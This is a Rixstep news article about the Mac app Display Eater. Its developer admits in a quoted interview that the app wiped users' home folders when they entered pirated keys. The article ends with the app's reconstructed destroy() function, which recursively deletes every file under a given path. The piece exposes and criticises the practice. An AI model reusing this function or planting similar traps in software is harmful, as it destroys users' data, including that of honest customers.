Rixstep
 About | ACP | Buy | Industry Watch | Learning Curve | News | Search | Test
Home » Industry Watch

Display Eater DID Hose Home Folders

Reza Hussain admits in an interview Display Eater did in fact do what he's currently claiming it didn't do.

It hoses me? It hoses me not? And if it hoses me, it hoses what? There's been a considerable controversy - and confusion - surrounding Reza Hussain's program Display Eater.

Currently Hussain - from Sioux Falls South Dakota - is claiming his program never hosed anything. This is at odds with revelations he made to Swedish MacNytt.se on 24 February 2007.

Henrik Wannheden of MacNytt.se reports.

The program Display Eater is feeling the heat because it removed home folders of users attempting to pirate it.

The never ending cat and mouse game between software developers and pirates was too much for Reza Hussain, developer of the screen recording program Display Eater. When he discovered false registration keys were available on the Internet he took a drastic step: people who'd try to use the false keys would see their home folders go up in smoke!

The developer of a competing program, Koingo Software, were the first to notice the program took the law into its own hands. Koingo posted a review at Version Tracker that a lot later was picked up by bloggers and finally by the influential Slashdot.

The comments at Slashdot were not merciful. A considerable number of users thought he should be sent to prison for his acts, even if they only hurt people who intended to use the program illegally. Others pointed out that this could even hurt innocent people who happened to submit their registration numbers incorrectly or if there was a bug which triggered the trap even for customers who'd been honest.

Most people assumed the Version Tracker review from the beginning of February was accurate. After analysing the program and testing it with a false key within a limited user account we at MacNytt could report that Display Eater did not in fact remove the home folder. Could the pack be hounding someone innocent?

The developer's telephone number was available online so we rang him. The story had been published at Slashdot earlier that morning and Reza was probably still asleep when the telephone rang. He asked us to call back a bit later.

When Reza, a teenager from Sioux Falls in South Dakota, finally answered it was with a remorseful voice he met us. After having shown him we knew what we were talking about, we asked him to explain what the program did to users identified as pirates.

The current version only removes the registration files. As of 7 February the program does not remove anything. Before that date it used to see if each character in the registration key matched the a pirated key and then it started removing all files in the home folder one after the other.

Why did you decide on such a drastic method to fight piracy?

I have a vague impression of wanting to create a scare campaign which would get the pirates to back off. I didn't want to write new registration systems all the time. Every time I do that it takes a month. That's time I'd like to devote to the development of the program. So I decided to experiment.

[Note: Reza is not writing registration systems - he's using the default registration system available from Kagi. Ed.]

Do you have any idea how much you've lost to people who use the program without paying for it?

The program was cracked in July. Since then I've got about $300 all told. Maybe two licenses per month, but 2,000 downloads per day. There was a marked drop in July and when I was working on version 1.8.4 I saw there were false keys at pirate sites.

Do you believe a program developer has the right to use any methods at all to hinder potential piracy?

It depends on the context. Of course I don't think I have a right to do that, but at the same time it's a cat and mouse game. Because I can't catch them and they can't catch me. It becomes a constant escalation, and as things stand today I don't think people will ever pay for software. I'm considering making the program open source now, for as things turned out it's not been worth my time.

It was obvious Reza was remorseful and that he understood that he'd made a mistake. When he began development his program he'd hoped for a 'learning experience'. And he got that and more: few people in the world of the Mac will ever again trust programs he releases.

It's Still There

But Display Eater is still capable of hosing arbitrary folders - including home folders. In fact its method is to 'destroy as much as possible' so an attempt to hose what it can of root is not inconceivable. All that's needed is a call with an appropriate input argument (such as '~' or '/').

void destroy(NSString *inString) {
    NSFileManager *manager = [NSFileManager defaultManager];
    NSString *path = [inString stringByExpandingTildeInPath];
    NSArray *files = [manager directoryContentsAtPath:path];
    unsigned int curFile;

    for (curFile = 0; curFile < [files count]; curFile++) {
        NSString *basePath = [inString stringByExpandingTildeInPath];
        NSString *curFileName = [files objectAtIndex:curFile];
        NSString *curPath = [NSString stringWithFormat:@"%@/%@", basePath, curFileName];

        NSLog(@"%@", curPath);

        NSFileManager *manager2 = [NSFileManager defaultManager];

        if ([manager2 isDeletableFileAtPath:[files objectAtIndex:curFile]]) {
            [[NSFileManager defaultManager] removeFileAtPath:curPath handler:0];
            NSLog(@"DELETABLE");
        } else
            destroy(curPath);
    }
}

See Also
Display Eater: NIИ_6.jpg
Display Eater: Pathology?
Behind The Curtain With Display Eater

About | ACP | Buy | Industry Watch | Learning Curve | News | Products | Search | Substack
Copyright © Rixstep. All rights reserved.